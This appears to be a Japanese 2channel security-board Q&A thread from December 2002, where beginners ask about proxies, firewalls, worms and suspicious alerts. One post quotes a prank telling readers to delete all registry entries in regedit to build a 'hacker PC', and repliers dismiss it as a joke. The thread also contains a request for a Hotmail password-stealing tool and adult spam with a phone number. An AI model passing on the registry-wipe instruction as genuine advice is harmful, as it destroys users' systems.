>>57
そうなんだ、早速バージョンアップしてきます。
ありがとうございます。
579名無しさん@お腹いっぱい。:02/12/16 04:06
助言を頂きたくてカキコいたします。

最近ヤフーのトップに行くと、自分ではクリックした覚えの無いトピックスが
訪問済みの色になっているのです。
最初は家族の誰かかな〜?と思っていたのですが、よく考えたら自分以外PCを使う者もおらず・・・

もしかして乗っ取りとかハッキングとかなのでしょうか?
未だにアナログ回線で、ISDNすら来ない田舎に住んでいるので、ネットをする時意外はモジュラージャックも抜いています。
オークションなどを利用するときは回線が弱すぎて画像の表示すら出来ない時があるので、串を通す場合もありますが、何か関係あるのでしょうか?

PC内に仕事のデータ(お客様の住所等も・・・)が入っているのでとても心配です。
どなたかご意見いただけましたらと思います。
>>579
他からリンク辿って行ってるだけだろ
よくあること。
本当にどうしてもどうしても気になって仕方がない場合は
(パーソナル)ファイアーウォールでも導入して「入ってくる」通信の内容を確かめてみ。
>>579
Yahooのトップのリンク先を見てみれば分かると思うけど
単にカテゴリ分けされたリンクが貼られてるだけだろ?
つまり以前に同じカテゴリのニュースをクリックしていれば
トピックスが変わっていたとしても訪問済みの色になるわけさ。
つまり>>581の言う通り「よくあること」なので気にしないに1票。
584名無しさん@お腹いっぱい。:02/12/16 05:07
>>512さん>>513さん初心者の珍質問に答えていただいてありがとうございますた。
今まで、ずっと気になっていて、夜も寝れなかったんです。
だから昼間寝てますた(藁
ようやく夜寝れます。
ありがとう。
585名無しさん@お腹いっぱい。:02/12/16 05:40
Important Information: Annoymous Proxy Server は無料の
プロキシーサービスです。(当プロキシーを使用する為に、ご利用者の
ブラウザーの設定は一切必要ありません。)
このプロキシーサーバーは、アクセスされる如何なる
インターネットユーザーの個人情報、若しくはアクセスログも
保管いたしません。又、ユーザーのアクセス調査にも使用
しておりません。ご利用頂ける利点は、危険なACTIVEXプログラムや
ひつこいJAVAポップアップなどを排除し、快適に
インターネットサーフィンを楽しめる道具としてのサービスです。
http://pxy01.pink-banana.com/cgi-bin/redirect.cgi

というのを見つけたんですけど本当に大丈夫ですかね?
削除依頼とかするとIPが出てしまうんで会社とかからだととかばれないように身元を隠したいんですけど
これ見るとログとってないようですし、ログ提示を要求とかされても提示出来ないということなんですよね
ただ、どこまで信用出来るかどうかというものはありますけど、どうでしょうか?
>>585
そのURLみて普通の人は気づくだろ。
587585:02/12/16 09:08
>>586
そんなにやばいすっか
削除依頼出すぐらいなんですが、ちなみにどんな情報とか
抜かれる可能性がありますかね。IPとか環境変数抜かれるぐらいなら
いいかなという気はするんですが、HDDの中身とか簡単に
抜かれるならまずいかも個人特定出来る情報とかあるんで
その辺よろしければ詳しい人教えてください
588bloom:02/12/16 09:36
589ドキンちゃん:02/12/16 09:40
>>587
誰に何を抜かれるというの。
HDDの中身とかは、どこかにアクセスしたとかカキコしたとか以前に、
セキュリティが甘ければいくらでも抜かれる可能性があるけど、
普通なら、どこかにカキコした位で抜かれる変数はこの程度。
http://www.ugtop.com/spill.shtml
590585:02/12/16 11:32
>>589
ありがとうございます。初心者なものでちょっと>>586の意味ありげな
書き込みで心配になってしまいました。
ただ、ログは本当はこっそりとってそうな気もしますね
じゃないとわざわざ無償でこんなものを提供してなさそうですものね
まあ、削除依頼で使うぐらいならたいしたことなさそうですが・・
>>585
メリットはなんだろうか
モニタリングかなやっぱり。。
まあ、ボランティアが主目的ではない罠、普通。
593名無しさん@お腹いっぱい。:02/12/16 11:53
Kerio 入れますた。で、一応確認したいんですけど

| SERVICES.EXE
| size=88848byte
| CRC16=6A56
| CRC32=EAE9606F
| MD5=e68ff41c8ce12461d2c8c18d383be645

で間違いないでしょか。win2k sp3 ie6.0 sp1 だす。
アンチウィルスソフトでチェックしてるし
ダイジョブだろうとは思ってるんですけど
いちおう。
つうか、削除依頼ぐらい生で出せ。人として
>>593
kerioスレで聞け、んで思うさま無視されるか叩かれるかしろ。
ったく初質スレで聞くなら使うなよ、kerioなんか
596585:02/12/16 12:21
>>594
会社からだとやばいっす!
会社からでも、会社がばれずに削除依頼出せるように。。
>>596
自宅であるいは個人契約の回線経由でやるという選択肢はゼロか。
598名無しさん@お腹いっぱい。:02/12/16 14:30
>595
でも別にKerio固有の話じゃないし。。
>>585
そもそも、そのプロクシから削除依頼できないみたいですよ。
そのプロクシから↓の削除依頼したら、削除対象URL入力したのに
http://pc.2ch.net/test/read.cgi/sec/1039053088/568

>「削除対象アドレス」が入力されていません!

となって削除できませんでした。

それからそのサイトもしかしたらアングラ違法オーナーの可能性だけでなく、
警察とかアメリカ政府とか違法エロサイト摘発市民団体のものの可能性も
あるんじゃないのですか?どこからたどりつかれたのですか?
私も2chのトリップが盗まれたりしないかちょっと心配になってきましたが
違法な事をしたりパスワード入力しなければ大丈夫のような気がします。
(´-`).。oO(アメリカ政府なんて言ってるよ・・・そのうち宇宙人の仕業だなんていいだすんじゃないか・・・)
>ヤブじゃないが
>そんな事いってるとヤブのでたらめを叩けなくなる。
>でたらめな回答は叩くべし。
     
↑ってなんですか?
なんで削除依頼出てるんですか?
602206.157.65.167:02/12/16 15:42
>>600
無知ですね。エシュロンをご存知ないのですか?

http://www.mainichi.co.jp/news/kotoba/a/20010528_01.html
◆ エシュロン ◆
 人工衛星などを使った米国主導の大規模な通信傍受網。
暗号名エシュロン(ECHELON)は階段、階層などの意味。
47年、米英が秘密裏に組織し、他の3カ国が加わった。
情報は米国家安全保障局に送られる。
 冷戦期は共産圏を対象にしたが、現在は商業通信や個人向けも傍受できる。欧
州連合(EU)の欧州議会は昨年7月、調査委員会を発足させた。
603勉強してください:02/12/16 15:45
604ななし:02/12/16 15:50
突然2ちゃんの文字が大きくなりました。ネットの文字すべてみてみたら
大きくなってます。なぜでしょうか?どうすればもとに戻りますか?
>>604

IEの場合なら、表示→文字のサイズで変更
606ななし:02/12/16 15:56
>>605
なおりました。有難うございました。
>>600
米国通信傍受機関とつぶれてしまったsafe webという匿名プロクシと
関係があったのではというのはハッカーやセキュリティーフリークの間では
結構有名なうわさだったが。
それから暗号ソフトPGPに米政府用のバックドアがあるのではという
うわさもある。
セキュヲタならそれくらい知ってて欲しかったな。
http://www.hotwired.co.jp/news/news/culture/story/20011128201.html
608名無しさん@お腹いっぱい。:02/12/16 16:07
ADSLって国際電話につながりませんか?
>>608
ADSL回線から直接繋がることはない。
アナログ回線のケーブルが繋がってるなら、繋がることがある。
610ドキンちゃん:02/12/16 16:12
>>608
スレがある。
ADSLユーザーにも 国際電話発信トラブル
http://pc.2ch.net/test/read.cgi/sec/1016106504/

611名無しさん@お腹いっぱい。:02/12/16 16:13
hotmailのパスワードを抜くツールって何処で手に入るんですか?
>>611
板のトップをよく読めば分かります。
薮叩きの粘着は相当DQNだな。
614yas:02/12/16 16:16
http://homepage.broba.ws/torajiro/guest/guide.html
の部落ら踏んでしまったんですが・・・・
どうしたら良いでしょう?
>>613
omaegana
616ドキンちゃん:02/12/16 16:28
>>614
特に何かする必要はないと思うが、
念のためにウィルスチェック。
エシュロンとプロキシに何の関係が?
618608:02/12/16 16:48
>>609-610
ありがとうございます。
絶食
620585:02/12/16 18:34
>>597
いや、ほとんどが会社生活で忙しいので・・・

>>599
ありがとうございます。
そうですね、2chに書き込むぐらいなら大丈夫そうですね

>「削除対象アドレス」が入力されていません!
というのはその串では削除依頼出来ないみたいですね
使う意味それなら意味ないかも・・・

この串を見つけたのは
http://pc.2ch.net/test/read.cgi/hack/969820686/261
で見つけました

621bloom:02/12/16 18:44
622名無しさん@お腹いっぱい。:02/12/16 18:54
串なんて何で通信内容見られるのに使ってる人多いんですか?
623名無しさん@お腹いっぱい。:02/12/16 19:17
1.自作自演
2.IPを偽装するため
3.連続投稿を回避するため
4.特殊な環境、たとえば海外とかからの書き込みとかの対応のため

624(´ー`)y-~~~ :02/12/16 19:25
結構ログ溜まるからねぇ。。
いちいち見てま千円。。

まあかつては串のキャッシュ機能を利用するって目的もあったんだけど
今はあんまり意味無いかなヽ(´ー`)ノ

>>622
625名無しさん@お腹いっぱい。:02/12/16 19:38
windowsで動くパケット送信ツール(どんなぱけっとでも送信できる
奴)でいいのあります??
>>625
初級ネットへどうぞ。
エロ画像落とすのによく使うよ>>串
>103 :薮パソユーザー ◆0fQkHdNop2 :02/12/16 15:14 HOST:EAOcf-166p158.ppp15.odn.ne.jp<8080><3128><8000><1080>
>削除対象アドレス:
>http://pc.2ch.net/test/read.cgi/sec/1038273005/

>削除理由・詳細・その他:
>私に対する誹謗中傷専用スレッドで固定ハンドル叩きです。
>私のセキュリティー板における発言に誤りがあれば、その
>スレッドで具体的に指摘すべきと思いますので不要で目障りな
>スレッドです。
>そういうわけですので削除御願いします。

http://qb.2ch.net/test/read.cgi/saku/1027430636/103

藪、『お前「が」不要で目障りなコテハン』なんだぞ〜
629名無しさん@お腹いっぱい。:02/12/16 23:18
>>624
>結構ログ溜まるからねぇ。。
>いちいち見てま千円。。

これは串鯖を立ち上げてログをためてたということ?
詳細キボンヌ
630名無しさん@お腹いっぱい。:02/12/17 00:25
ここに来て聞いてと言われました。送信してないのに、勝手にメールを送信してしまうウィルスは
何ていうものですか
>>630
ワーム
>>630
うーむ・・・
633名無しさん@お腹いっぱい。:02/12/17 01:14
>>631 ワームはかなり悪質ですか?
>>633
知らない間に他人にウイルス送信、トラフィック増加など、自分にも他人にも迷惑がかかる。
635:02/12/17 01:21


5 名前:.NET.hack.com ◆NAMAemoU7s :02/12/17 00:04 ID:n7HYw+KP
誰でもできる簡単な最強ハッカー使用パソコンの作り方を教えます
スタートメニュー

「ファイル名を指定して実行」を起動し、 regeditと入力してEnterする

でてきたウィンドウ内に表示されてる物は、
MS社がいれたハッキングストッパーみたいなものなので、
消せるだけ消す。
消し方は、右クリック→削除 とするだけ。
消した数が多ければ多いほど強いパソコンができあがるので、
気合いを入れて消しまくってください。
確認ダイアログがでても、無視しなくてはなりません。途中でやめると、失敗ですので最後まで消してください。

↑これってどうなんですか?
試してみてもいいですか
>>635
ああ。
お前だけな。人には勧めるなよ
>>635
試す前に検索エンジンで「レジストリ」をサーチしてみるんだな。
>>637
いや、ネタだろう。
639名無しさん@お腹いっぱい。:02/12/17 02:03
質問なんですけど、名前のとこにfusianasanていれるとどうなるのですか?
ほかのとこで書いてあったもので
>>635
よりによってセキュ板で誰が引っかかるんだよ。
>>639
リモートホストが出る。
リモートホストって何ですかという質問には答えない。
641名無しさん@お腹いっぱい。:02/12/17 02:09
>640
ありがとうございます。
リモートホストとは何ですか?と聞きたいです;;
それがでるとなにかまずいのでしょうか?
わかりやすくおしえていただけませんか?
643adsl-1-5064.adsl.nsk.ne.jp:02/12/17 02:11
>>641
こうなるんだよ
何もまずくないよ
644名無しさん@お腹いっぱい。:02/12/17 02:18
>642 643
ありがとうございます くだらない質問なんですね;;
>>643
それどこですか?
プロバイダー。
おーい誰かー
「自分で調べろこの糞虫」って>>645にいってやってよー
>>645
自分で調べろこの糞虫
さっきノートン インターネット セキュリティが
「セキュリティ警告!‘The Thing'トロイの木馬のデフォルト遮断」
と騒ぎ出しました。
最近の不正侵入試行:5とか出てるんですが、どう対処したらよいでしょう?
ウイルススキャンはしているんですが・・・。
>>648
説明書かヘルプでFWのログの見方についてしらべたらどうですか?
もちろん手元にあればの話ですが。
>>648
もう1回その警告を声出して読んでみろ。
1回じゃだめだろ
100回くらいだな
窓を開けて大声で
652648:02/12/17 02:57
すいません。無知すぎてFWさえわかりません。
出直してきます。御迷惑をおかけして申し訳ありませんでした。
653cheshire-cat ◆PhCATJR.v6 :02/12/17 03:16
>>652
メーカー違いだけど、同じ内容なんで。
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=3269
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=3374

つか。
>遮断
ブロックされたんならええやん。
654648:02/12/17 03:54
>>653
ご親切にありがとうございます。
不正アクセスなんて初めて見たので取り乱しました。

>>653
禿同。

だが、ウイルス対策ソフトって、そのようなびっくりさせるメッセージ類多くない?
「ブロックしたので安心よん♪」とか出ればいいのにね。

(だからアレはケンシロウなのか・・・?)
>>653
お、俺のパソコン「が」狙われているッ!
657名無しさん@お腹いっぱい。:02/12/17 17:34
接続プロバイダ名とかIPアドレスとかが表示されてしまう掲示板に書きこむ際に、
プロバイダ名等を表示されないようにするにはどうしたらいいのでしょうか?
IEのインターネットオプションのどこだかを設定すればいいような事を聞いたのですが。
>>657
表示されるのがいやなら書き込まない
659質問します:02/12/17 17:39
こんなメールが届きました。
<送信者>******@hotmail.com
<本文>Kaspersky give you the W32.Klez.E removal tools
W32.Klez.E is a dangerous virus that spread through email.

For more information,please visit http://www.Kaspersky.com


ウイルスの注意をうながすメールなんですかね。添付ファイルもあったけど、
開いても大丈夫ですか?


661ななし:02/12/17 17:47
こちらに誘導されましたので、改めてお願いします。

初心者的質問ですみません。ADSL導入に伴いウイルスバスター2002
を入れていますが最近ファイアウォールの警告が頻繁に
出ます。主にNetBIOSとかいうもので必ずしも不正アクセス
ではないらしいのですが、一日数回アタックしてくるので
心配です。
それはともかく、そろそろ2003にアップグレードしたい
のですけどそうなると一旦2002をアンインストールしなきゃいけません。
その間にアタックしてやられたらどうしようかと不安でまだ出来ていません。
どうか教えてください。




>>661
ポート137でスキャン増加が発生
http://pc.2ch.net/test/read.cgi/sec/1033726535/l50
663センドメール:02/12/17 17:51
情報漏洩を監視するため、社内からの送信メールを全てBCCでセキュリティ責任者のアドレスへ送付したいと思っています。(送信ログを落とす方法ではなく)sendmailを使用しているのですが、実現方法をご存知の方教えてください。
664名無しさん@お腹いっぱい。:02/12/17 17:53
>>661 ファイアウォールアンストールして
変わりにZoneAlarmにしる
sendmail社に聞けば?
666ななし:02/12/17 18:03
>>662>>664
即レスありがとうございます。難しいですが
じっくり読んで対策します。
>>661

> それはともかく、そろそろ2003にアップグレードしたい
> のですけどそうなると一旦2002をアンインストールしなきゃいけません。
> その間にアタックしてやられたらどうしようかと不安でまだ出来ていません。

不安ならLANケーブル抜きゃいいだろ
>>664
質問に対する回答になっていない
669がも山:02/12/17 18:09
Kiss Love ダウンロード  世界標準
http://www.kisslovetoco.com/
670bloom:02/12/17 18:16
671名無しさん@お腹いっぱい。:02/12/17 18:44

質問です。

「ウイルス」と「ウィルス」、どちらが一般的な書き方ですか?
マジレスおながいします・・・。
672名無しさん@お腹いっぱい。:02/12/17 18:46
-------変態・MTTどこでも-------

---●●●変態痴女を紹介致します。●●●---

例えば>欲求不満オマ●コヌレヌレ女・露出オナニー痴女・

フェラチオおしゃぶり女・ミニスカ・ノーパン娘・巨乳パイズリ娘・

アナルSEXおねだり娘・オマ〇コ弄られマン汁グチョグチョ女・

SM牝豚・緊縛・浣腸・スカトロ・等・・・刺激を求めています。

●●●学生・OL・主婦・モデル・牝豚・女王様・オカマ等・多数!●●●

 090-8002-8356番   
下のカタカナを小文字に変換してください。
  http://www.エムティーティー.jp/i
673名無しさん@お腹いっぱい。:02/12/17 18:51
ルータのファイヤーウォールが外れません…
どうしたらいいでしょうか?
>>671
google

日本語のページからウイルスを検索しました。 約479,000件中

日本語のページからウィルスを検索しました。 約482,000件中

675671:02/12/17 18:58
>>674 Thx!!!同じぐらいですか。

しかし…それだとブルースウィルスとかも混入していると思います…

どっちがいいのだろう・・・
http://www.ipa.go.jp/security/isg/virus.html

「ウイルス」にしておくと安心。で、発音は「うぃるす」。
677671:02/12/17 19:12
>>676 めちゃめちゃThx!
はぁ、ここの板の皆さんはみんな優しいですね…。
かなりずっと悩んでいた問題だったのですっきりしますた。

では半角板に帰ります。
なぁ、自作自演だろ>>671>>674-677
つまんねぇよ
>>677
(・3・) エェー 正確にはヴィールスだC
>>675
(・3・) エェー 正確にはウィリスだYO
↑あのなぁ、おまえなぁ、こういう時はブルースウイルスっていうんだよ。わかったか。
682名無しさん@お腹いっぱい。:02/12/17 20:12
こちらで質問した方が良いとのことですので、
流れてまいりました・・・。

ノートンインターネットセキュリティのせいで、
IEのオートコンプリート機能(IDやパスワードの記憶)が
できなくなることってありますか?

ある掲示板で毎回入力しなければなりません。
回避方法があれば教えてください。
>>682
(・3・) エェー オートコンプリートの設定タブはオンにしてるNO?
>>682>>683
知障どうし世紀の一戦だな
>>683
お気遣い、ありがとうございます。
先ほど、パソコンのメーカーサポートのほうに
電話して症状を言ったところ、
パソコン自体のほうに問題があることがわかりました。
修理に出します。
686名無しさん@お腹いっぱい。:02/12/17 21:13
串の刺し方についての質問なのですが、
たとえば、127.0.0.1:8080というアドレスの串を
http://zzz.comにアクセスするときに使いたいとき
http://127.0.0.1:8080-_-http://zzz.comって感じにやる方法ありましたよね?
あれの方法を詳しく教えてください。
セキュリティと関係ないね
pcqa板に行きな
こんにちは。
質問です。
私はMSNのメールを利用しているのですが、
先日受信箱にいこうといしたら
『セキュリティ証明書が期限切れ、もしくはまだ有効になっていません』
みたいなことを表示されました。(それまで普通に使えました。)
期限が下に記入されていたので見たところまだ、期限はきれてませんでした。
どうしたら、よいでしょうか。
(MSNの受信箱に行く以外にも
プロバイダのサイトでアドレス変更などの画面に行こうとしたら
同じ症状が見られました。)
どなたか教えて下さい。よろしくお願いします。
>>688
「戻る」とか使ってない?
MSNのサポートに問い合わせる。

なんか同じ奴が質問してないか?わざと
そろそろネットワークセキュリティに関係ある質問をしてくれ
---esboss---otakara/-----/img20021214230730.gif

↑みたいなやつ何か知りませんか?偶然なのか、踏んだ次の日にハードディスクが
壊れたんですが。
692名無しさん@お腹いっぱい。:02/12/18 01:34
たすけてください;;;
クリスマスって言葉が入ってるメールが知り合いの名前で
送られてきてたため不用意に添付を開いてしまいました;
ウイルス感染は初体験で混乱しまくりです。。。
こんな内容書くのは気が引けるのですがどうしたらいいか
わからなくて
>>691
情報不足。

>>692
まさかとは思うが、ウイルスチェックはしたよな?
694691:02/12/18 01:45
http://esboss.com/otakara/cgi-bin1/img20021214230730.gif

正確には↑なんですが。何気なく踏んだら「ウイルスをインストール中」と出て、
最後のメッセージが「The end」。

ウイルススキャンでも引っかからないし、その日は何ともなかったので、Jokeの類かと
安心してたら次の日突然落ちて再起動不能と。
695692:02/12/18 01:45
ウイルスチェックっていうのはウイルススキャンってやつですか?
>>694
よくあるジョーク画像。実際のウイルスなら、完了画面は出ません。
ハードディスクの寿命とか、他の場所に原因あり。
あと直リンはやめて。

>>695
その通り。
697691:02/12/18 02:18
>>696
どうも。。直リンはまずいと思って一部抜かすつもりがそのままコピーしてしまい
ました。回線切って逝きます。
なんか車板や一部の板に行くとバーを動かしただけで真っ白になって何も見えないんですけど、どうすればいいんですか?
板違いなのは申し訳ないんですけど、初級ネット板も真っ白になっちゃって…
教えてください
>>698
メモリ不足だと思うが。必ず起きる現象?
700698:02/12/18 02:41
>699
最近、explorerを変えたんですけど、それから起きたような、そうでもないような…
車板にいくと必ずおきます
でヤフーに戻ろうとするとこれまた真っ白
でも、一部の板や車板を経由しない通常のサイトは問題なしなんです
適当な2ch専用ブラウザ使え。いや解決にはならんのだが

IEコンポーネント不使用につきIEの不具合ならこれで見れるかと。
これでもみれなきゃ原因は別。2ch以外のサイトも真っ白になるならそれもまた別。

OpenJane Doe
http://downloads.sourceforge.jp/jane/1835/openjanedoe-0.1.5.1.zip
ていうか「真っ白になる」がわからん。ページ表示欄だけ(メニューや枠はそのまま)?
ページのソース表示させるとなにか書いてある? ていうかIEの出すエラーページではない?
すんまそん、keiro fire wallを購入しようとおもったのですが
ホームユーザーフリーとありますね。
これって30日たってもずっと使い続けれるってことですか?

見たところ、別バージョンが存在してるわけでもなさそうですし。
ホームユーザーなので、ただですむならありがたい話。

んでも、ホームユーザーとビジネスユーザーって
どうやって見分けるのでしょう、登録とかそういうのした覚えもないし。
>>703
>ホームユーザーフリーとありますね。
>これって30日たってもずっと使い続けれるってことですか?

そういう事。

ホームユーザーとビジネスユーザーの見分け方は無し、利用者の良識のみ。
セキュリティに気を使う人々は最低限の不文律・モラルを持っている事を祈るだけ。
>>700
そうなんですか、ありがとうございます
ちなみに
shiled up!
http://grc.com/x/ne.dll?rh1ck2l2

で調べてみたところ
SygateFW は all stealth
KeiroFW はnet biosだけstealth
MSFTDSとRPCがOpenで
後はClose,
これって、Sygateに比べるとだいぶ性能が落ちるようですが、
個人使用では問題ないんでしょうか。

SygateではLANの方で不具合が出て、良いソフトを探しているのですが。
うーん、すべてうまくいかせるのは難しい、、

ちなみにPCが荷台あって、一方をネットに接続して、もう片方をw2kのネット共有で
ネットを使えるようにしてあります。
Sygateだと、2個目のPCからはメインの方にアクセス出来なくなるんですよね、
これは、それらしい設定を変えても反映されない様子、バグだと思います。

Keiroの方では、ファイルの共有はできるんですが、openポートが二つあるのは不安だ、、、
しかし、FTPサーバしか走らせてないのに、なんでだろう。(サーバのポート番号は適当に変えてます
知り合いしか使わないので)

質問ついでにRPCとMSFTDSがopenな理由と、その意味、対処法など教えて頂けたら幸いです
…ルールは自分で設定しろ。
ルールの自作が(機能的にor難しすぎて)できないなら
そんなソフトはそもそも使うべきではない。
巷でどんなにもてはやされていてもね。
>>706
closedをstealthに自分で設定出来ると言うことですね、
やってみます、ただ、そういう表記はどこにもみあたらないので
Sygateでは自動でStealth,Keiroでは自動でCloseかOpen
になっていました。

全部をStealthになれるようにがんばってみます、おそらく
Keiroにも、パケットをいっさい返さないという設定があるのかな??
708名無しさん@お腹いっぱい。:02/12/18 12:23
ルーターにセキュリティ機能があって、
FWやアンチウィルスソフトと同じように使えるものってありますが、
そういうのと、実用的にはどうなんでしょうか?

ソフトだと各PCに入れる必要がありますが、ルーターの追加機能だと
いわゆる入り口でふさいでくれるので便利かなと思うのですが。
709名無しさん@お腹いっぱい。:02/12/18 12:33
>>708 トレンドマイクロからこんなのが出てるが。
http://www.trendmicro.co.jp/gatelock/index.asp
710 新ワーム?:02/12/18 22:03
iraq_oil.exe は新型ワームだから、対ウイルスベンダーから最新定義ファイル公開されるまで、再インストールするまでネットに繋がないでください。 おながいします。
と、プロバから電話きますた。
Windows2000Pro SP3 環境にて C:\WINNT\system32 から同名のファイル見つかりガクガクブルブルを漏れを助けてください。
711cheshire-cat ◆PhCATJR.v6 :02/12/18 22:10
>>710
とりあえず北斗の拳用に、メルで送ってくだされ。

こんなん出てますが。
http://www.infoworld.com/articles/hn/xml/02/12/17/021217hniraqoil.xml?s=IDGNS
713cheshire-cat ◆PhCATJR.v6 :02/12/18 22:13
445かぁ。
専用スレ、誰か立ててくれませぬか?
微妙にへなちょこっぽいイメージなんだけど、流行るのかなあ。
716cheshire-cat ◆PhCATJR.v6 :02/12/18 22:26
ありゃ、イラクオイルってW32.HLLW.Liotenと同じ奴やん。。。。。。
718たろう:02/12/18 22:43
NIS2002をアンインストールしてからNIS2003をインストールしようとしたところ、
NISをインストールする前にコンピュータを再起動して以前のアンインストールを
完了するひつようがあります・・・・」のエラーが出てきて、NIS2003を
インストールすることが出来ません。
一応シマンテックのHPのサポートにあったこと(tempの削除。RNIS,RNAV等のツールの使用
norton や symantec等のファイルの削除、関連レジストリの削除)を試してみたのですが
だめでした。試しにもう一度NIS2002を入れてみたら出来たのですが、購読期限は
何故か前のまま表示されました。シマンテックのHPに載っていないことが
ほかにもあるのでしょうか?ちなみにOSはWIN2K。IEは6です。
719 新ワーム?:02/12/18 22:52
>>712 他のみなさま
直電かかってくるレベルのどえらい物と思ってあわててますた
へたれな漏れやプロバ担当者共々感謝します
720名無しさん@お腹いっぱい。:02/12/18 23:31
TCP SYNFLOOD攻撃ってなんですか?

メルコの無線ルーターを今日繋ぎました。
すると、その攻撃をブロックしたって出ます
昨日まではその攻撃にやられていたと思うんですが
自覚は全くありませんでした。

ブロックしてるし、自覚もなかったのですが
少し気になったので・・・
721名無しさん@お腹いっぱい。:02/12/18 23:39
動画に埋め込まれるウイルスってありますか?
友人から危険だと脅されました
Mac,IE5,OE4.5使ってます
>>721
>>Mac,IE5,OE4.5使ってます
723名無しさん@お腹いっぱい。:02/12/19 00:00
>>718 2002のレジストリが残っているから当然。
>>720 検索しろ。
http://www.google.co.jp/search?q=TCP+SYNFLOOD%8DU%8C%82&ie=Shift_JIS&hl=ja&btnG=Google+%8C%9F%8D%F5
724ひよこ名無しさん:02/12/19 00:02
ネットやってたらいきなり、
□←こんな画面が出てきて
上にメッセージで下に
rdふぁ」:あえ」あくぇwttふぁ
こんな感じ(もっと荒れてた)が出てきて
怖くなってオルト+F4押して終わりました
いったいなんなのですか
725721:02/12/19 00:04
>>722
どどどういう事ですか?
726名無しさん@お腹いっぱい。:02/12/19 00:09
ノートンの体験版入れたら添付ファイルが削除されるようになりました。
どうしたらいいんですか?
727名無しさん@お腹いっぱい。:02/12/19 00:10
↑メールの添付ファイルのことです
728にゃ:02/12/19 00:11
>>720
TCP SYN 送って、ACK 返さずに TCP SYN だけ洪水のように送りまくる。
だから、TCP SYNFLOOD 。つか、google いったらもっと丁寧に書いてあるトコあるだろ。
なんでココに来た。
ショックウエーブのバージョンってどうやって調べんの?
>>729
ネタか?
IEの「ツール」→「インターネットオプション」→「全般」→
「インターネット一時ファイル」→「設定」→「オブジェクトの表示」
んでずらずら出てくるからshockwaveのアイコンを右クリック。
バージョンタブを見るよろし。
731名無しさん@お腹いっぱい。:02/12/19 09:02
>>729-730 Flash Playerにバッファ・オーバーフローのセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021217/1/
>>721

>動画に埋め込まれるウイルスってありますか?

セキュリティーホールを利用したものがあるようなのでIEだけでなく動画再生に
関係するウィンドウズメディアプレーヤーとかreal playerとかflashとかを
最新のものにするかパッチをあてるかしてください。

http://vbc.trendmicro.co.jp/vbc/monthly/200210/vclass1.asp
>2002年7月下旬に発見されたメニーマイズ(WORM_MANYMIZE.A)は、
>Internet Explorerに加えて、Windows Media Playerのセキュリティホール
>も利用します。ここで利用されているWindows Media Playerのセキュリティ
>ホールとは、対応の動画ファイル(通常は安全なもの)を実行すると、
>同時にEXEファイルなど(つまりウイルス)を実行させることが可能になる
>というものです。メニーマイズは、Internet Explorerのセキュリティホール
>で動画ファイルを自動実行させて、さらにWindows Media Playerの
>セキュリティホールでウイルスを自動実行させるというきわめて手の込んだ
>ウイルスなのです。Internet Explorerのセキュリティホールがふさがれて
>いても、動画ファイルを自分で実行すると、ウイルスも同時に活動を始めて
>しまいます。
>>732 おい荒らし、いい加減帰れ。昨日は平和だったのに。。。
734721:02/12/19 10:24
>>732
有難うございます。
私自身でもあちこち調べた結果、動画系のウイルスや>>731のような事も
多数ありました。SWFファイルは仕事で扱っているのでMacといえども
油断なりませんね
>>722の意味がいまだ理解出来ませんが...
>>734 あとはNorton Antivirus for Mac 常駐させとく。
>>732は有名な荒らしなのでスルーしてください。
736名無しさん@お腹いっぱい。:02/12/19 10:57
プロクシを設定する以外に
自分のIPを偽装する方法はありませんか?
>>736 何のために?
738名無しさん@お腹いっぱい。:02/12/19 11:30
>>736 板違い。セキュリティに関係なし。http://pc.2ch.net/hack/へ
739名無しさん@お腹いっぱい。:02/12/19 11:43
740692:02/12/19 12:30
ウイルススキャンしようと思ってやってたら途中で
消えてしまいました、何回やっても途中で消えてしまうので
結局PCを初期化してしまいました。
でも今後の参考に初期化以外でそういうのの対処法なんかありましたら
教えてください(><)
>>740
PC初心者
http://pc.2ch.net/pcqa/

たぶん根本的に知識不足。的確な説明もできないくらいにね。
742名無しさん@お腹いっぱい。:02/12/19 12:44
>>740 ウィルスに感染してからアンチウィルスをインストールしても
ウィルス(ワーム)によってはアンチウィルスソフトの活動を阻害するものもあるので、
そのアンチウィルスソフトの説明書やサイトの説明にしたがってインストールすること。

例:インストール前に既にウイルスに感染している場合の対応
http://service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/4aefaadc9d7b2aef8825694c005b6a08/c97c85508849f90285256b03005a9e78?OpenDocument

>>741 禿胴
WinXPと他のOSでTCP/IPでLANを組んでいます。
ルーターを介して、WAN側はCATVネットです。

セキュリティを考えたら、XP(もしくはWin2000)は、NBTを[無効]にした方が
良いと聞いたのですが、現在は[規定値]になっています。

人に聞くと、ここは[無効]にして「TCP/IPによるファイルの共有」は
使わない代わりに[NetBEUI]を使うのが良いとのことですが、実際どうでしょうか?
[規定値]にしておくとどう言う動きになるんですか?

あと、調べていたら、[無効]にするとファイルの共有が出来ないので、
フォルダにパスワードを設ければ回避できると判ったのですが、
WinXPにNetBEUIをインストールしないでファイルの共有を使った場合、
必然的にTCP/IPによる共有になるので、危険なのでしょうか?
質問するときはageた方がいいと思われ。age。
745743:02/12/19 14:46
>744
ありがとう。すみません。
746746:02/12/19 15:25
pen2 400mhzのマシンなんですが…ノートンとバスターどっちがイイですか?
>>746 2003年版はどっちも重め。
CPUよりもリソースの方が重要。OSは何?
748746:02/12/19 15:36
Win98です
749 :02/12/19 18:53
NIS2002を使ってるんですけど、ノートン有効にしてるとIEに繋がりません。無効にすると
問題なくネットに接続できます。ノートンのインターネットアクセス制御ではIEを「全てを許可する」
に設定してるのに駄目です。どうしたらいいんでしょうか。ケーブルネットでOSは98、IEは6.0です。
750名無しさん@お腹いっぱい。:02/12/19 19:31
質問です。
アクセス制御に失敗している
BBSなどを覗き見るのは不正アクセスに該当するのでしょうか?

管理者はパスワードをかけているつもりのようですが
(上のディレクトリに認証ページのようなものがあり。恐らくそのページから
隠しBBSにジャンプする仕組み)
そのBBSのURL直リンクで丸見えなんですが・・・
>>750
法には抵触しないが恨まれる可能性はあり。
すみません、質問があるのですが…

最近になってタスクトレイに見慣れないアイコンが出現したのです。
しばらくは気にもとめませんでしたが、
先ほどいきなりアイコンの文字が赤くなって画面のマウスカーソルが
リモートコントロールされているような感じで勝手に動き出したのです。

アイコンは2台のPCが繋がっているような絵に青いRの文字がのっていて
ダブルクリックすると「CurrentConnections」というキャプションのウィンドウに
